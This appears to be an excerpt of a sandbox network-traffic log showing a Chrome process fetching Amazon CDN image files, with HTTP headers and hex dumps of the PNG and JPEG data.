                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 9a 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 01 03 04 05 06 07 02 08 09 10 00 02 01 03 03 02 02 05 08 08 06 03 00 00 00 00 01 02 00 03 04 11 12 21 31 05 06 13 51 22 32 41 71 a1 07 14 15 23 42 61 81 91 43 52 54 72 92 93 b1 c1
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1Q"2Aq#BaCRTr
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: a3 da b6 16 f4 c0 a4 95 14 01 fb 55 7f fd 93 67 99 9e 73 08 f8 27 a7 f6 6f 53 b8 a9 6e ef 6a cb 44 d5 42 d5 58 a0 40 a0 86 6d f5 67 89 f5 8f 4f f9 3f b9 be 44 77 b9 a5 46 ad 54 d6 96 ed bd 52 9e 64 02 0a f2 33 b3 63 33 5e f9 42 b1 34 6d ee 3c 02 ca e1 1f 4b 6b 66 6e 09 e4 92 67 59 b0 ea fd 33 b9 13 a7 df dc 51 43 71 6d a1 e9 d4 23 d3 a0 ce b8 3a 1f 9d 2d e5 c3 63 89 5a ad 9d 1b 9a 91 55 fd 92 2d d1 d4 6e 2d 69 49 db f7 4e 4c e4 37 dd 0a f3 a6 5c 78 35 d7 43 ae 08 7c e5 4e 38 65 3e d1 33 06 f2 9a 33 ba d0 40 ce c4 b3 1c d4 cb 1f 25 3b 0c 9e 06 f3 ad f7 3b 5b 54 a2 b4 ab 52 f1 32 2a 7d 6f b2 80 45 d4 5c b7 b3 7c 2a af 2e 4f 90 69 a3 f6 79 a0 95 45 4a d4 4d 57 f1 29 28 20 6a f0 43 f1 50 af 91 7c 29 6f b1 90 78 cc ca ab a2 ca 9d d4 28 53 97 96 5e 64 6a 43 5f
                                                                                                                                                                                                                                                                Data Ascii: Ugs'oSnjDBX@mgO?DwFTRd3c3^B4m<KkfngY3QCqm#:-cZU-n-iINL7\x5C|N8e>33@%;;[TR2*}oE\|*.OiyEJMW)( jCP|)ox(S^djC_
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC274INData Raw: 63 ff 00 51 39 8a a9 62 14 72 66 7e 85 2f 09 02 c6 7c 4f 70 96 c8 af 3e 11 b4 5b 36 64 c7 78 5e 5b 5d 53 b9 4b 6d 5a 0e ea aa 17 5a 9d 99 72 d5 50 0c 8e 0e 0e 27 57 b6 ef 1e 9b 7d 4d 6a 1a c2 91 23 74 a9 e8 3a 9f 23 ec 3e f0 48 9c 68 89 05 41 93 0e 2c ae 9f 9a 29 a3 8c f8 46 dd af 2c 9a 67 6b fa 7e c0 f1 75 4b f9 82 3e 9e b1 fd a6 9f f1 89 c4 cd 35 f2 91 e1 2f 94 eb e2 f9 fe 33 97 83 61 f9 19 db 0f 71 74 f4 04 b5 d5 3f e2 cc e7 dd df dd df 4b 04 b5 b3 07 c1 46 05 9c 8d 3e 21 1c 00 39 d2 39 c9 e4 cd 58 22 8f 64 9c 4a f7 1c 4b 56 bd 37 4d 24 93 dc b1 6f c3 14 68 54 55 1b 6d ad 8b 74 2c 65 c0 cc 98 99 79 35 30 22 22 41 22 22 20 02 22 20 06 aa 22 22 5f 2d 08 88 8a 07 a8 88 8a c0 09 31 11 19 06 72 d2 8a a2 2b 01 bb 63 79 77 11 38 bd ca f2 7e 66 22 22 29 02 22
                                                                                                                                                                                                                                                                Data Ascii: cQ9brf~/|Op>[6dx^[]SKmZZrP'W}Mj#t:#>HhA,)F,gk~uK>5/3aqt?KF>!99X"dJKV7M$ohTUmt,ey50""A"" " ""_-1r+cyw8~f"")"


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                36192.168.2.449871151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC418OUTGET /images/G/39/gno/sprites/nav-sprite-global-1x-reorg-privacy._CB600087478_.png HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 14256
                                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                                X-Amz-IR-Id: d9981bfa-95bf-4c37-969e-dc4760a4520f
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Thu, 01 Jun 2023 22:09:04 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Fri, 06 Nov 2043 07:13:30 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1458254
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:25 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000066-IAD, cache-nyc-kteb1890053-NYC
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 5e 00 00 01 c2 08 03 00 00 00 90 51 51 10 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 02 f4 50 4c 54 45 47 70 4c ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff d4 d4 8d ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 91 8b 49 94 c1 43 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 98 98 98 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 99 cc 33 ff ff ff 10 10 10 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                Data Ascii: PNGIHDR^QQgAMAasRGBPLTEGpLIC3
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: 0f 9f 3d 4c 13 6f 9b 86 b5 37 65 1d ef de d2 d2 cc 93 a1 11 e8 15 87 c4 a5 d9 25 f1 cd 80 38 34 24 6e e0 99 81 21 19 ef ae b8 34 b3 21 4e 50 06 f6 75 31 32 8f 11 4a 19 53 e2 96 b9 96 f6 6b 11 2a 3f c1 9a 01 bc d2 56 39 f8 dc f4 fb a8 1e 74 8c b5 06 a5 93 a9 da bb a3 e5 31 41 f8 f7 00 e0 f9 ce ed b5 0f f3 6b 8f 77 c6 00 c6 8e fe 99 9a 17 e6 9f 3f ff 57 10 3e ad 03 3c db 16 04 e1 69 9a a2 e1 0b a4 4e 37 6d bc 7f 89 9f 31 33 0c 23 5e f1 cd 30 7c 16 c5 89 45 a8 98 15 5f 9c c1 3b 22 ee d2 d6 6b f4 46 98 83 01 c4 5a 49 78 99 4a 83 ff fa 91 b8 0a 6c 4e d6 55 ea 08 32 0d 66 63 af 37 84 c7 1d a0 47 ee 93 11 66 25 bc ac df cf 58 57 ea c9 42 6c 9f be 22 c9 75 78 2c dc 9d 17 84 b5 db c2 5d 80 bb 82 f0 7e 1b f7 e6 c7 3e 09 c2 6d 58 bf 2b 6c df 3e 12 be 5c 79 37 a3 c1
                                                                                                                                                                                                                                                                Data Ascii: =Lo7e%84$n!4!NPu12JSk*?V9t1Akw?W><iN7m13#^0|E_;"kFZIxJlNU2fc7Gf%XWBl"ux,]~>mX+l>\y7
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: 2d f7 db 20 2b 66 0b 5f d2 98 1f b4 3a fb bb c3 3f f6 80 8c e3 e5 92 e5 a9 49 01 6f 71 42 52 37 8f 74 ad 82 ef 70 bc 9b c7 9b 84 17 2b 78 36 98 a5 fe ab e2 44 f3 85 a2 ae df 52 28 46 59 e3 0f 76 ef 3e 5f cb 2c de 40 c8 a2 f2 d2 37 2f 30 99 1c fc 15 a6 4d 7d 58 d4 4c 26 0a 0c f6 4d 49 3b 40 53 c8 44 dd 22 b6 fb 09 67 c4 92 8c c9 17 c7 94 6e 6b 6d 38 64 aa 04 f5 82 db 6c d9 b4 87 92 35 e4 e5 21 a9 c9 16 df d6 ea 72 c3 05 e7 d4 ae a6 18 b3 ff 4a 5d d7 72 d5 96 51 6b 2b 4b 29 e8 4d d3 b4 f7 83 e6 c3 d8 39 89 0e cf 59 aa 7b 14 5d ea 9c c6 6b bb 53 d0 4d 1d 5b 59 b4 0e 8c 73 82 75 73 05 a7 09 57 87 63 5b d8 32 42 dd b5 d6 42 4e e3 75 91 08 5b 6c 59 4d b4 36 36 ca b5 be 2b 11 f2 36 17 86 0e ad bc e7 c3 1a d3 82 dd 9d f1 b2 f8 43 63 6d 1a 16 29 ce 68 6a ee 60 4d
                                                                                                                                                                                                                                                                Data Ascii: - +f_:?IoqBR7tp+x6DR(FYv>_,@7/0M}XL&MI;@SD"gnkm8dl5!rJ]rQk+K)M9Y{]kSM[YsusWc[2BBNu[lYM66+6Ccm)hj`M
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: cf 3e 82 83 2d dc 0e 03 9b cd d5 45 e1 05 33 62 51 c5 ec 38 19 6f 0d 14 fe 10 92 43 87 8a af 47 4d 6a e3 b2 c6 06 70 ee 2a 91 70 a8 50 b0 ed ad 28 b6 25 14 bc 1a 86 57 94 88 83 46 23 0c af c1 3a 6a 66 0b be 9d 74 d2 fb c5 e3 f5 a8 76 02 28 66 d2 89 78 5d 90 4d e1 2e 50 cc 0c 18 ec f3 2f 41 f9 3d 9a 70 60 4f 08 a0 4a b4 94 08 6f 85 82 6d 4e 6a d7 25 69 b8 00 6f bd 55 3f 4d 25 66 b1 5a e3 d5 66 c9 da 37 40 53 c5 e3 b5 aa 4b 18 96 dd 77 9c 84 17 55 2e f0 28 80 01 d1 df 4d 54 73 19 34 af a4 13 a7 b4 47 35 d7 3c 42 c9 96 b6 8a 04 db 84 51 2a 0e f5 8f be 65 78 1f 2b 78 87 29 1f 1c 5d 6e a3 cd 1f ef d7 1b 12 74 d9 3a e4 2b 1e 2f 98 61 cd ce 18 16 04 d2 b0 70 02 5e 9c 97 8e be 98 e2 6a a8 d6 99 0b 02 d6 5e a8 1c a4 34 19 6b b3 2b 32 b8 74 9a 43 25 86 a9 cb 6f 36
                                                                                                                                                                                                                                                                Data Ascii: >-E3bQ8oCGMjp*pP(%WF#:jftv(fx]M.P/A=p`OJomNj%ioU?M%fZf7@SKwU.(MTs4G5<BQ*ex+x)]nt:+/ap^j^4k+2tC%o6
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: 2d 09 15 af 0b 85 e9 19 f0 42 bc b6 5e 0c a8 09 35 88 b5 39 af 98 c5 34 0e 8f c7 11 87 73 0a 71 e8 9a a9 55 ce 70 d5 f1 0a 98 e4 72 06 bc b5 aa 78 1e d2 28 ba 59 52 0d df 22 5e 7d ae 86 f3 06 9a c9 1a 36 d7 25 dd e5 c2 7b 70 50 55 7a bc 26 6c 5e 7a 06 bc 9d ec 9e 37 0f 46 72 2e ed 14 76 7e 55 f1 2e 31 1d 2e e2 f2 4d e1 39 db 28 75 34 a9 49 1e 57 76 a8 78 a7 99 2c f5 9d 05 af 10 c0 e5 ee 1b f3 39 9a c5 db ab a4 3c 72 ca 39 87 99 82 86 21 e0 ab 8d 77 28 d4 94 0a a0 56 70 06 bc c0 91 0f 4d 46 9b 2c 8a 8d 11 13 d9 cf 5b 73 c6 7e c0 db ce 26 6c b7 7e 20 a8 e0 bd a1 2a c3 57 1c af 32 e2 1d 67 c3 6b 96 0a b2 c1 49 5e 57 06 92 63 b4 40 f6 12 17 4f cb dc 8e ef 52 e0 35 42 b6 3c 44 09 c9 a4 28 0e 29 86 ae 28 7a cc a4 db 23 8a 9d 70 97 8b 22 98 68 16 51 84 b4 5b 5f
                                                                                                                                                                                                                                                                Data Ascii: -B^594sqUprx(YR"^}6%{pPUz&l^z7Fr.v~U.1.M9(u4IWvx,9<r9!w(VpMF,[s~&l~ *W2gkI^Wc@OR5B<D()(z#p"hQ[_
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: 7e d3 72 6e 08 5e e5 3b 53 0b 03 5c 8f 93 e6 a5 af f4 2c cc 0d 0c e8 40 df c0 f0 c2 ab 95 35 92 8a 3a 81 7c b3 73 44 e5 37 3c f1 f2 d4 50 27 59 df 38 42 6a 78 35 10 ef da dc 2d 67 72 dc 78 f6 bf b3 d7 15 bc 08 62 3b 75 d2 4d 3a b2 64 da 8a a7 ed 8d 5d e4 13 a8 09 bc 08 f0 74 2e 99 b7 b7 df d9 db 2b e7 f8 f6 92 8c f4 f7 23 73 aa be d9 39 b9 9c 9c 8c f7 7b 3a fd bb 27 5b 2f b8 d6 be 7d ff 89 ce 71 f0 ea f4 71 5a d9 e3 57 44 76 e9 ae a8 cc 34 6b 04 2f 72 11 79 79 d3 23 1f 64 97 3c a7 2e dd 3b 0f 45 f1 f4 5d cc 8b e2 3d ad e0 c5 8b 77 17 c8 52 d2 f3 36 c5 39 5c d8 51 61 11 4f 61 5a 44 f1 52 f3 c9 da c3 8b a3 88 9e c5 09 92 36 3d 32 38 ba 56 b9 ac 69 34 a6 3d 6c 23 e6 78 9f e0 3d be 13 ef 35 ec 93 cf 03 32 4b ff 37 f2 d3 57 a9 d1 92 1a 54 ad 4b e4 c1 b4 87 64
                                                                                                                                                                                                                                                                Data Ascii: ~rn^;S\,@5:|sD7<P'Y8Bjx5-grxb;uM:d]t.+#s9{:'[/}qqZWDv4k/ryy#d<.;E]=wR69\QaOaZDR6=28Vi4=l#x=52K7WTKd
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: 1c 84 f7 43 6e 08 d4 0c 5e 9d 2f 9d de 1e ee 4c e9 b4 dd b2 03 6f 64 e7 c9 32 35 2e 7d 11 2f 3a f2 4a 72 56 00 ae 31 33 0b a1 3f 93 c9 f8 4c 7c d4 95 4a 1a f5 99 94 75 0a 47 5d 3a a3 cb 0a ad 8e b8 ec 34 85 60 12 da 1c 7c c4 00 15 bc fa 8c 03 da 52 c6 83 6e c7 fb e6 67 b6 b2 d9 80 c7 e3 41 cc 66 3c 1e 3d d8 f0 8c 79 d0 09 cb 7c 00 87 13 81 0d 72 d9 fa 24 09 2e 3c 69 8a 97 db 24 fb 9e b2 01 7f c4 fd c1 7a a4 c1 2f e0 75 92 69 c5 a0 34 81 5e f4 3d 0b 6a e2 cd 25 8b 18 05 fa e2 82 6e 74 6c 0a 98 52 f2 89 24 31 53 5e de b3 da 14 bc 82 9c 41 6d 38 e0 1d 56 b3 8a c6 00 18 cb 66 d3 33 78 1b 19 eb a4 72 1c 5b f6 27 65 67 86 e0 9d 0c c8 bb 93 5c 99 7f a0 24 f5 8f f6 4b d2 82 3c 43 c3 44 c9 14 b8 4f 92 74 f2 b1 09 34 af d3 83 e1 7e 3a 6d 5b 53 13 af 80 f3 cc 83 5e
                                                                                                                                                                                                                                                                Data Ascii: Cn^/Lod25.}/:JrV13?L|JuG]:4`|RngAf<=y|r$.<i$z/ui4^=j%ntlR$1S^Am8Vf3xr['eg\$K<CDOt4~:m[S^
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: b7 be fd ed 6f 5d f6 fe 74 56 9b 35 1f 5a 6d a3 1a cc 2c b3 51 78 f7 5e b9 f2 d5 56 c4 9b c2 72 46 b9 f1 aa 61 65 e4 00 a0 f7 3c 7a bf 5d b2 c1 be 77 4b e2 65 39 28 b3 59 dc 9b 97 11 18 af 72 54 bc d6 b8 37 77 ef e2 84 0e cf e4 86 5c 7f 78 f7 ee dd 22 78 69 2c 96 83 ef 05 2c 19 1d 21 d5 d2 4e 21 71 cc 76 cc 88 76 57 4a 55 89 2f ee 36 1d 6d cb 45 3c 26 f5 15 4e 89 fe e1 0c 21 f7 6e 92 7d 27 0f 7e b7 87 62 dc e3 70 5e 61 c3 bf 7b ee 98 bc 78 6f 5c c1 99 51 5b 25 20 53 d2 d6 58 b9 1e 8c a9 24 d5 4a 03 04 6a a0 ea 26 62 6e 00 a8 5c d7 3d e5 3a 9c bd d7 2f e1 64 05 a7 13 a7 a2 3b 9d 1f 9f 71 3a 0f ba 27 32 38 9d b9 1e bc fb 68 25 5c 61 d3 f9 b6 40 60 46 cf ff e2 56 a5 91 99 ec 61 68 e9 ef 00 e8 38 0e 2d f5 00 8a f5 dd d3 4d 36 0f 7a c7 59 a4 88 8f 8d fd cb 41
                                                                                                                                                                                                                                                                Data Ascii: o]tV5Zm,Qx^VrFae<z]wKe9(YrT7w\x"xi,,!N!qvvWJU/6mE<&N!n}'~bp^a{xo\Q[% SX$Jj&bn\=:/d;q:'28h%\a@`FVah8-M6zYA
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: 39 e1 7a c8 39 45 aa cf 8f b8 ba 47 02 3e 7d fe b3 9f 87 6f df 76 8d 70 4c 91 fb 87 fb b3 ae d9 e1 4f fd 10 de 7d e2 f1 ac 6b 78 f7 7d 17 4f b1 b0 16 5d 7d 4c fd ab ab fb e1 c8 ed cf 3d 63 c2 bb 6f 7f 7a ee 22 5d d9 f5 33 21 17 1f 73 44 6b f4 c0 0c 30 aa ab bb fb 62 77 d7 ac f0 cf 17 23 f8 b4 c3 2e 9e b8 62 ed 2e 78 e4 a2 6b a9 ba 1e 7e c3 6c f9 c1 55 4e 67 3d b4 fb c4 d7 c3 dd b3 d4 70 67 bf 38 f2 70 e4 01 7f 66 04 17 17 17 17 17 d7 2a 05 7e 14 f2 33 25 9c 1b c7 cb c5 c5 c5 c5 c5 b5 ea cb 1f bf b4 71 bc 31 13 98 71 71 bc 5c 5c 5c fc d2 c6 f1 72 71 71 f1 c0 8c 8b e3 e5 e2 e2 e2 e2 e2 e2 e2 e2 e2 e2 e2 e2 e2 e2 e2 e2 e2 e2 e2 da fa 92 3c 09 b6 f5 4d 80 f5 16 d9 d2 ff 65 3c 13 aa 7f 7d 34 ff 34 f0 c6 d7 35 3f f9 a7 db a0 5c c2 57 26 6a 88 66 be cf c7 67 a6
                                                                                                                                                                                                                                                                Data Ascii: 9z9EG>}ovpLO}kx}O]}L=coz"]3!sDk0bw#.b.xk~lUNg=pg8pf*~3%q1qq\\\rqq<Me<}445?\W&jfg
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: aa dd 31 c3 9f 6e bc ff 75 c7 0f d5 c1 f8 ce af 82 6e 60 f3 ed a7 eb 1b c3 3e b7 11 8e b8 ea 1a 5a 6f 6d b2 67 d1 b6 4a e3 15 6a 68 bb 9f f5 07 82 d5 4f 3d 88 69 05 e2 15 24 07 4a 89 2a d0 ec 74 49 e0 19 e6 6a f0 6b bd a0 26 41 ed f7 d0 2a 8e 08 8b 6e 5d b9 ba 30 6c e3 8d 10 ce ca 1a 5a 39 3f f7 ff ed 9d cd 4f 1a 69 1c c7 1f bb 88 42 75 60 51 71 15 a6 89 d6 95 a0 14 d6 da ac 15 d7 b8 86 80 07 63 62 82 17 13 d3 78 d2 f0 2f 78 dc 83 7f c2 de 9a 34 5e d6 13 09 9e 3c 35 de d4 db da 43 bb cd be e4 b9 c8 01 c1 55 bb 76 53 f7 b2 cf 33 30 30 cc 0c 03 f3 cc 20 2f fe 3e 69 35 a3 95 c2 e7 f9 f2 bc cc cc f3 73 82 d3 6a 1f 0f 7e 8c 82 78 5d 78 2b 06 d1 2c 1e d0 dd e7 07 0b 3a cb fb 5e ed a1 e4 d5 2f b5 d8 cd c7 77 5c 65 34 c6 fa 37 e0 b1 c8 51 b6 90 4d f1 d5 4d cd f6
                                                                                                                                                                                                                                                                Data Ascii: 1nun`>ZomgJjhO=i$J*tIjk&A*n]0lZ9?OiBu`Qqcbx/x4^<5CUvS300 />i5sj~x]x+,:^/w\e47QMM


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                37192.168.2.449872151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC437OUTGET /images/G/39/consumables_uae/Amazonbasket/XCM_Manual_1532278_5307764_400x39_2X._CB616351825_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 9461
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 3edb6a12-5c48-420a-af14-45e0d938299d
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Mon, 23 Jan 2023 14:44:12 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Wed, 01 Jun 2044 08:49:22 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1150324
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:25 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100145-IAD, cache-nyc-kteb1890084-NYC
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0a 09 0a 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c2 00 11 08 00 27 01 90 03 01 11 00 02 11 01 03 11 01 ff c4 00 37 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 02 03 05 06 08 07 04 09 00 01 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 02 01 04 05 06 07 03 00 08 09 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fa 5f f0 0e c2 2a ab 32 a3 db ea
                                                                                                                                                                                                                                                                Data Ascii: JFIF'7_*2
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: 63 1a 89 56 fc 3b 01 6e d5 b4 58 e6 4e 1f 09 6c 82 ac 4c ec 89 9f d3 54 ad 65 b3 26 e3 56 48 29 ee 4f c1 5a 2c 16 3e 88 33 2b 60 49 83 33 0c 75 6c d6 3a e3 38 29 74 f1 3b e4 46 be 42 9d b5 b1 d5 dd be b5 7d 42 8c b6 3c ab 15 b8 b1 fc b8 16 e4 9d 4c bd 0b c7 2a 43 76 b3 cf 73 ef 65 ff 00 10 b1 fb 75 d9 bf c6 e8 7f d8 b4 a9 c8 3a f6 42 b5 ba 40 ac 61 c1 c4 5a a9 5e 6c 76 63 27 52 97 f3 26 36 a6 17 19 83 7e 36 8f 66 ce 47 71 f4 fe 60 ba 49 a2 8c 96 75 05 f1 64 6b a8 6b ca 44 cd ca 15 46 d6 11 8c 2e 31 cc cc da 7b 95 99 c7 a4 69 f0 e7 78 8b 1a d7 05 fb b5 22 0a 8d 56 90 ef 53 1b 27 69 11 4f fa ad f8 94 6a 9f 3b 91 4b ab e7 f1 ab 05 80 77 59 c6 63 e2 31 6b b7 0d bd 6b 7d f2 2b ab 7a ef 27 da 9a 5b d3 b1 56 aa 8a 59 ac bc 23 0f 42 ae 2e 26 37 6d 5b 27 58 8b ac
                                                                                                                                                                                                                                                                Data Ascii: cV;nXNlLTe&VH)OZ,>3+`I3ul:8)t;FB}B<L*Cvseu:B@aZ^lvc'R&6~6fGq`IudkkDF.1{ix"VS'iOj;KwYc1kk}+z'[VY#B.&7m['X
                                                                                                                                                                                                                                                                2024-08-12 13:23:25 UTC1378INData Raw: c9 7e e7 be 9f 75 fe a0 f9 13 ed e8 b8 3c 4f ed 5e 72 dc 2e 97 c2 20 59 a1 b6 bd 45 00 0b 41 8b c7 81 50 27 32 25 d9 c9 f8 2b a2 4d ac a0 67 19 e7 3f c2 9d 46 ed e4 bb aa 35 6e 8f e7 22 ff 00 f4 bc 94 d3 2d 35 2e af 33 2b 8b 88 26 d9 fd 2b 97 e2 a7 d9 52 2a aa 48 17 5c 76 8a 8e 2f 25 0c 1f 04 f2 1a db 1e fe a9 ae 0d 63 ff 00 8e 5d 8c 76 5d fb 72 17 1a f6 1f 88 f5 5f 66 c7 3c a1 fa 8d fe a5 64 56 e8 3b ae 08 01 c4 52 7a 7c 7f 28 4c 30 47 98 4f e2 38 8f 72 b8 6e 2d 9f 44 1d 24 4f e5 a8 c2 e2 65 c7 13 cd 04 5e e2 0f 8a ab fc bb a2 3b 82 69 82 13 9e 48 3e 29 8f 20 1f 44 f7 17 10 07 42 57 11 c5 c6 3c d3 5e e0 07 67 f5 1d f1 11 94 c6 80 14 75 e9 d1 12 00 e1 83 d0 13 7c 94 3a 9d 91 e6 10 c0 47 21 1c fa a0 2c 67 28 62 ea 33 e2 9b 60 16 0f b2 a4 76 44 0f 4c 28 b0
                                                                                                                                                                                                                                                                Data Ascii: ~u<O^r. YEAP'2%+Mg?F5n"-5.3+&+R*H\v/%c]v]r_f<dV;Rz|(L0GO8rn-D$Oe^;iH>) DBW<^gu|:G!,g(b3`vDL(
